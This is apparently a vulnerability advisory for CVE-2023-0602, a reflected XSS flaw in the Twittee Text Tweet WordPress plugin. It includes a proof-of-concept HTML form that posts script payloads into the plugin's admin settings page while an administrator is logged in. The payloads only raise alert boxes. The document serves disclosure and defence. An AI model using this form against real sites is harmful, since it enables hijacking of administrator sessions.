Twittee Text Tweet <= 1.0.8 – Reflected XSS | CVE 2023-0602

Description

The plugin does not properly escape POST values which are printed back to the user inside one of the plugin's administrative page, which allows reflected XSS attacks targeting administrators to happen.

Proof of Concept

The endpoint http://<hostname>/wordpress/wp-admin/admin.php?page=twittee-text-tweet&saved=true
is vulnerable to POST-based XSS via `tweetTooltip` and `tweetContent` parameter. This happens because of improper handling of user input and the plugin does not properly validate the `nonce`.


1. Save the following as .html file and open it in the browser where Administrator is logged in.
```
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://172.28.128.6/wordpress/wp-admin/admin.php?page=twittee-text-tweet&saved=true" method="POST">
      <input type="hidden" name="saved" value="true" />
      <input type="hidden" name="option&#95;page" value="default" />
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="&#95;wp&#95;http&#95;referer" value="&#47;wordpress&#47;wp&#45;admin&#47;admin&#46;php&#63;page&#61;twittee&#45;text&#45;tweet" />
      <input type="hidden" name="tweetText" value="&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="tweetContent" value="&lt;script&gt;alert&#40;2&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="tweetTooltip" value="&lt;script&gt;alert&#40;3&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="tweetID" value="" />
      <input type="hidden" name="tweetPosition" value="topMiddle" />
      <input type="hidden" name="tweetTheme" value="cream" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```